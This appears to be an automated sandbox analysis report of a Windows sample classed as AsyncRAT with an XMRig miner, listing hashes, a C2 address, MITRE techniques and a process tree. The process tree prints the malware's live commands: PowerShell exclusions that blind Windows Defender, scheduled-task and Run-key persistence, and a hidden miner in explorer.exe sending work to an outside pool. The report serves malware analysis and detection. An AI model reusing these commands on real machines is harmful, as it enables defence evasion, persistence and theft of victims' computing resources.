asyncrat | cae246e1b4386518005749ac3958c4506d448f1f7efdd49d839dd10a5e01be2b

Analysis

max time kernel
149s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18-10-2024 22:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

59acf298702bd7b13089a8883460fde5_JaffaCakes118.exe
Size

1.3MB
MD5

59acf298702bd7b13089a8883460fde5
SHA1

3d757f96fb6fa2b2020c3072f7dfebcaddca59ab
SHA256

cae246e1b4386518005749ac3958c4506d448f1f7efdd49d839dd10a5e01be2b
SHA512

6e2b0b52d498d3c77cba2fa1ce348d0c5d15bea12065df52209c312db28f7a783cdd05905a9b2b418f25d171266f173a14dd0b48721a24bac48dd461e268d52e
SSDEEP

24576:seKBtGLmFZsPlMD7KleDlws8zqUNdKfYupom0LdeTUw1Z5gOENl2for92Pvolxv:seKBtfgG7KylX8FwUrdtw1zEL2for90e

Score

10^/10

asyncrat xmrig default discovery execution miner persistence rat

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

service32.sytes.net:8848

Mutex

NFHaufhauiwfhawfw

Attributes

delay
1
install
false
install_file
vmdservice.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/736-424-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/736-425-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/736-431-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/736-432-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/736-430-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/736-429-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/736-428-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3208	powershell.exe
2788	powershell.exe
4728	powershell.exe
1760	powershell.exe
4220	powershell.exe
4540	powershell.exe
2104	powershell.exe
4476	powershell.exe
2300	powershell.exe
2704	powershell.exe
3980	powershell.exe
4104	powershell.exe
3308	powershell.exe
3336	powershell.exe
3484	powershell.exe
4496	powershell.exe

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ETC1final.exesvchost64.exeservices64.exe59acf298702bd7b13089a8883460fde5_JaffaCakes118.exeXMRfinal.exesvchost32.exeservices32.exesvchost64.exesvchost32.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	ETC1final.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	svchost64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	services64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	59acf298702bd7b13089a8883460fde5_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	XMRfinal.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	svchost32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	services32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	svchost64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	svchost32.exe

Executes dropped EXE 12 IoCs

Processes:

Adobe-GenP-2.7.exeXMRfinal.exeETC1final.exeupdate.exesvchost64.exesvchost32.exeservices64.exeservices32.exesvchost64.exesvchost32.exesihost64.exesihost32.exe

pid	process
3056	Adobe-GenP-2.7.exe
4844	XMRfinal.exe
4848	ETC1final.exe
2040	update.exe
2524	svchost64.exe
948	svchost32.exe
1576	services64.exe
400	services32.exe
2368	svchost64.exe
4492	svchost32.exe
764	sihost64.exe
1396	sihost32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Service = "C:\\Users\\Admin\\AppData\\Roaming\\update.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service
T1102

Processes:

flow ioc

50 raw.githubusercontent.com
51 raw.githubusercontent.com
52 raw.githubusercontent.com
54 pastebin.com
56 pastebin.com

flow	ioc
50	raw.githubusercontent.com
51	raw.githubusercontent.com
52	raw.githubusercontent.com
54	pastebin.com
56	pastebin.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Windows\SysWOW64\Adobe-GenP-2.7.exe	autoit_exe

Drops file in System32 directory 13 IoCs

Processes:

svchost64.exesvchost32.exesvchost32.exe59acf298702bd7b13089a8883460fde5_JaffaCakes118.exesvchost64.exe

description	ioc	process
File opened for modification	C:\Windows\system32\services64.exe	svchost64.exe
File created	C:\Windows\system32\services32.exe	svchost32.exe
File created	C:\Windows\system32\Microsoft\Telemetry\sihost32.exe	svchost32.exe
File created	C:\Windows\SysWOW64\XMRfinal.exe	59acf298702bd7b13089a8883460fde5_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\ETC1final.exe	59acf298702bd7b13089a8883460fde5_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\update.exe	59acf298702bd7b13089a8883460fde5_JaffaCakes118.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	svchost64.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	svchost64.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.log	svchost64.exe
File created	C:\Windows\system32\Microsoft\Telemetry\sihost32.log	svchost32.exe
File created	C:\Windows\SysWOW64\Adobe-GenP-2.7.exe	59acf298702bd7b13089a8883460fde5_JaffaCakes118.exe
File created	C:\Windows\system32\services64.exe	svchost64.exe
File opened for modification	C:\Windows\system32\services32.exe	svchost32.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

update.exesvchost64.exe

description	pid	process	target process
PID 2040 set thread context of 964	2040	update.exe	aspnet_compiler.exe
PID 2368 set thread context of 736	2368	svchost64.exe	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.exe59acf298702bd7b13089a8883460fde5_JaffaCakes118.exeupdate.execmd.exepowershell.execmd.exepowershell.execmd.exepowershell.exepowershell.exeaspnet_compiler.exepowershell.exepowershell.exepowershell.exereg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	59acf298702bd7b13089a8883460fde5_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3592 schtasks.exe
4396 schtasks.exe
2804 schtasks.exe
2076 schtasks.exe

pid	process
3592	schtasks.exe
4396	schtasks.exe
2804	schtasks.exe
2076	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Adobe-GenP-2.7.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost64.exesvchost32.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost64.exesvchost32.exeexplorer.exe

pid	process
3056	Adobe-GenP-2.7.exe
3056	Adobe-GenP-2.7.exe
3056	Adobe-GenP-2.7.exe
3056	Adobe-GenP-2.7.exe
3056	Adobe-GenP-2.7.exe
3056	Adobe-GenP-2.7.exe
3056	Adobe-GenP-2.7.exe
3056	Adobe-GenP-2.7.exe
4728	powershell.exe
3484	powershell.exe
4728	powershell.exe
3484	powershell.exe
1760	powershell.exe
3980	powershell.exe
3980	powershell.exe
1760	powershell.exe
4496	powershell.exe
4220	powershell.exe
4496	powershell.exe
4220	powershell.exe
4540	powershell.exe
4104	powershell.exe
4104	powershell.exe
4540	powershell.exe
2524	svchost64.exe
2524	svchost64.exe
948	svchost32.exe
948	svchost32.exe
3308	powershell.exe
3308	powershell.exe
3308	powershell.exe
3208	powershell.exe
3208	powershell.exe
3208	powershell.exe
2104	powershell.exe
2104	powershell.exe
3336	powershell.exe
3336	powershell.exe
3336	powershell.exe
2104	powershell.exe
4476	powershell.exe
4476	powershell.exe
2788	powershell.exe
2788	powershell.exe
2788	powershell.exe
4476	powershell.exe
2300	powershell.exe
2300	powershell.exe
2704	powershell.exe
2704	powershell.exe
2300	powershell.exe
2704	powershell.exe
2368	svchost64.exe
2368	svchost64.exe
4492	svchost32.exe
4492	svchost32.exe
736	explorer.exe
736	explorer.exe
736	explorer.exe
736	explorer.exe
736	explorer.exe
736	explorer.exe
736	explorer.exe
736	explorer.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Adobe-GenP-2.7.exe

pid process

3056 Adobe-GenP-2.7.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

Processes:

update.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost64.exesvchost32.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost64.exesvchost32.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	2040	update.exe
Token: SeDebugPrivilege	4728	powershell.exe
Token: SeDebugPrivilege	3484	powershell.exe
Token: SeDebugPrivilege	1760	powershell.exe
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeDebugPrivilege	4496	powershell.exe
Token: SeDebugPrivilege	4220	powershell.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	4540	powershell.exe
Token: SeDebugPrivilege	2524	svchost64.exe
Token: SeDebugPrivilege	948	svchost32.exe
Token: SeDebugPrivilege	3308	powershell.exe
Token: SeDebugPrivilege	3208	powershell.exe
Token: SeDebugPrivilege	2104	powershell.exe
Token: SeDebugPrivilege	3336	powershell.exe
Token: SeDebugPrivilege	4476	powershell.exe
Token: SeDebugPrivilege	2788	powershell.exe
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeDebugPrivilege	2368	svchost64.exe
Token: SeDebugPrivilege	4492	svchost32.exe
Token: SeLockMemoryPrivilege	736	explorer.exe
Token: SeLockMemoryPrivilege	736	explorer.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

Adobe-GenP-2.7.exe

pid process

3056 Adobe-GenP-2.7.exe
3056 Adobe-GenP-2.7.exe
3056 Adobe-GenP-2.7.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

Adobe-GenP-2.7.exe

pid process

3056 Adobe-GenP-2.7.exe
3056 Adobe-GenP-2.7.exe
3056 Adobe-GenP-2.7.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

59acf298702bd7b13089a8883460fde5_JaffaCakes118.exeXMRfinal.exeETC1final.execmd.execmd.exeupdate.execmd.execmd.execmd.exesvchost64.exesvchost32.exe

description	pid	process	target process
PID 1060 wrote to memory of 3056	1060	59acf298702bd7b13089a8883460fde5_JaffaCakes118.exe	Adobe-GenP-2.7.exe
PID 1060 wrote to memory of 3056	1060	59acf298702bd7b13089a8883460fde5_JaffaCakes118.exe	Adobe-GenP-2.7.exe
PID 1060 wrote to memory of 4844	1060	59acf298702bd7b13089a8883460fde5_JaffaCakes118.exe	XMRfinal.exe
PID 1060 wrote to memory of 4844	1060	59acf298702bd7b13089a8883460fde5_JaffaCakes118.exe	XMRfinal.exe
PID 1060 wrote to memory of 4848	1060	59acf298702bd7b13089a8883460fde5_JaffaCakes118.exe	ETC1final.exe
PID 1060 wrote to memory of 4848	1060	59acf298702bd7b13089a8883460fde5_JaffaCakes118.exe	ETC1final.exe
PID 4844 wrote to memory of 4832	4844	XMRfinal.exe	cmd.exe
PID 4844 wrote to memory of 4832	4844	XMRfinal.exe	cmd.exe
PID 4844 wrote to memory of 4832	4844	XMRfinal.exe	cmd.exe
PID 1060 wrote to memory of 2040	1060	59acf298702bd7b13089a8883460fde5_JaffaCakes118.exe	update.exe
PID 1060 wrote to memory of 2040	1060	59acf298702bd7b13089a8883460fde5_JaffaCakes118.exe	update.exe
PID 1060 wrote to memory of 2040	1060	59acf298702bd7b13089a8883460fde5_JaffaCakes118.exe	update.exe
PID 4848 wrote to memory of 1028	4848	ETC1final.exe	cmd.exe
PID 4848 wrote to memory of 1028	4848	ETC1final.exe	cmd.exe
PID 4848 wrote to memory of 1028	4848	ETC1final.exe	cmd.exe
PID 1028 wrote to memory of 3484	1028	cmd.exe	powershell.exe
PID 1028 wrote to memory of 3484	1028	cmd.exe	powershell.exe
PID 1028 wrote to memory of 3484	1028	cmd.exe	powershell.exe
PID 4832 wrote to memory of 4728	4832	cmd.exe	powershell.exe
PID 4832 wrote to memory of 4728	4832	cmd.exe	powershell.exe
PID 4832 wrote to memory of 4728	4832	cmd.exe	powershell.exe
PID 2040 wrote to memory of 1312	2040	update.exe	cmd.exe
PID 2040 wrote to memory of 1312	2040	update.exe	cmd.exe
PID 2040 wrote to memory of 1312	2040	update.exe	cmd.exe
PID 1312 wrote to memory of 4568	1312	cmd.exe	reg.exe
PID 1312 wrote to memory of 4568	1312	cmd.exe	reg.exe
PID 1312 wrote to memory of 4568	1312	cmd.exe	reg.exe
PID 1028 wrote to memory of 1760	1028	cmd.exe	powershell.exe
PID 1028 wrote to memory of 1760	1028	cmd.exe	powershell.exe
PID 1028 wrote to memory of 1760	1028	cmd.exe	powershell.exe
PID 4832 wrote to memory of 3980	4832	cmd.exe	powershell.exe
PID 4832 wrote to memory of 3980	4832	cmd.exe	powershell.exe
PID 4832 wrote to memory of 3980	4832	cmd.exe	powershell.exe
PID 1028 wrote to memory of 4496	1028	cmd.exe	powershell.exe
PID 1028 wrote to memory of 4496	1028	cmd.exe	powershell.exe
PID 1028 wrote to memory of 4496	1028	cmd.exe	powershell.exe
PID 4832 wrote to memory of 4220	4832	cmd.exe	powershell.exe
PID 4832 wrote to memory of 4220	4832	cmd.exe	powershell.exe
PID 4832 wrote to memory of 4220	4832	cmd.exe	powershell.exe
PID 1028 wrote to memory of 4104	1028	cmd.exe	powershell.exe
PID 1028 wrote to memory of 4104	1028	cmd.exe	powershell.exe
PID 1028 wrote to memory of 4104	1028	cmd.exe	powershell.exe
PID 4832 wrote to memory of 4540	4832	cmd.exe	powershell.exe
PID 4832 wrote to memory of 4540	4832	cmd.exe	powershell.exe
PID 4832 wrote to memory of 4540	4832	cmd.exe	powershell.exe
PID 2040 wrote to memory of 964	2040	update.exe	aspnet_compiler.exe
PID 2040 wrote to memory of 964	2040	update.exe	aspnet_compiler.exe
PID 2040 wrote to memory of 964	2040	update.exe	aspnet_compiler.exe
PID 2040 wrote to memory of 964	2040	update.exe	aspnet_compiler.exe
PID 2040 wrote to memory of 964	2040	update.exe	aspnet_compiler.exe
PID 2040 wrote to memory of 964	2040	update.exe	aspnet_compiler.exe
PID 2040 wrote to memory of 964	2040	update.exe	aspnet_compiler.exe
PID 2040 wrote to memory of 964	2040	update.exe	aspnet_compiler.exe
PID 4844 wrote to memory of 2868	4844	XMRfinal.exe	cmd.exe
PID 4844 wrote to memory of 2868	4844	XMRfinal.exe	cmd.exe
PID 4848 wrote to memory of 2816	4848	ETC1final.exe	cmd.exe
PID 4848 wrote to memory of 2816	4848	ETC1final.exe	cmd.exe
PID 2868 wrote to memory of 2524	2868	cmd.exe	svchost64.exe
PID 2868 wrote to memory of 2524	2868	cmd.exe	svchost64.exe
PID 2816 wrote to memory of 948	2816	cmd.exe	svchost32.exe
PID 2816 wrote to memory of 948	2816	cmd.exe	svchost32.exe
PID 2524 wrote to memory of 3888	2524	svchost64.exe	cmd.exe
PID 2524 wrote to memory of 3888	2524	svchost64.exe	cmd.exe
PID 948 wrote to memory of 2648	948	svchost32.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\59acf298702bd7b13089a8883460fde5_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\59acf298702bd7b13089a8883460fde5_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1060

C:\Windows\SysWOW64\Adobe-GenP-2.7.exe
"C:\Windows\system32\Adobe-GenP-2.7.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3056

C:\Windows\SysWOW64\XMRfinal.exe
"C:\Windows\system32\XMRfinal.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4844

C:\Windows\SysWOW64\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4832

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4728

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3980

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4220

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4540

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\SysWOW64\XMRfinal.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:2868

C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\SysWOW64\XMRfinal.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2524

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
5⤵
PID:3888

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
6⤵
- Scheduled Task/Job: Scheduled Task
PID:2804

C:\Windows\system32\services64.exe
"C:\Windows\system32\services64.exe"
5⤵
- Checks computer location settings
- Executes dropped EXE
PID:1576

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
6⤵
PID:3816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2104

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
6⤵
PID:184

C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
7⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2368

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
8⤵
PID:2328

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
9⤵
- Scheduled Task/Job: Scheduled Task
PID:3592

C:\Windows\system32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
8⤵
- Executes dropped EXE
PID:764

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xm32.sytes.net:3333 --user=42WzHajZYgxRN4QzQPKRQb55kWV73KbJF2RF2APYi5wWLdHnsCCjBSiTw5RAvGQyARYJV6KCFLp8BfKATvhBbERpUqrPFAE --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6MwWH/E8SWd448Nij92PUK8=" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=90 --nicehash --tls --cinit-stealth
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:736

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
8⤵
PID:4776

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
9⤵
PID:4548

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
5⤵
PID:2728

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
6⤵
PID:1616

C:\Windows\SysWOW64\ETC1final.exe
"C:\Windows\system32\ETC1final.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4848

C:\Windows\SysWOW64\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1028

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3484

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4496

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4104

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\SysWOW64\ETC1final.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:2816

C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\SysWOW64\ETC1final.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:948

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
5⤵
PID:2648

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
6⤵
- Scheduled Task/Job: Scheduled Task
PID:2076

C:\Windows\system32\services32.exe
"C:\Windows\system32\services32.exe"
5⤵
- Checks computer location settings
- Executes dropped EXE
PID:400

C:\Windows\system32\cmd.exe
